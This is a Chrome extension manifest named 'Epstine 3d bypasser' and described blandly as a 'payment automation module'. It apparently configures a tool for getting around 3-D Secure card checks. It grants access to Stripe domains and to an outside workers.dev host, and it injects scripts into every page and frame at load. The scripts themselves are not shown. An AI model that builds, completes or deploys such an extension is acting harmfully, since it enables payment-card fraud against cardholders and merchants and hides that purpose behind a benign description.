{
  "manifest_version": 3,
  "name": "Epstine 3d bypasser",
  "version": "1.0.0",
  "description": "Advanced payment automation module",
  "icons": {
    "16": "icon.png",
    "48": "icon.png",
    "128": "icon.png"
  },
  "permissions": [],
  "host_permissions": [
    "https://api.stripe.com/*",
    "https://js.stripe.com/*",
    "https://*.stripe.com/*",
    "https://hello.niansuhai.workers.dev/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"],
      "run_at": "document_start",
      "all_frames": true
    }
  ],
  "web_accessible_resources": [
    {
      "resources": ["inject.js", "icon.png"],
      "matches": ["<all_urls>"]
    }
  ]
}
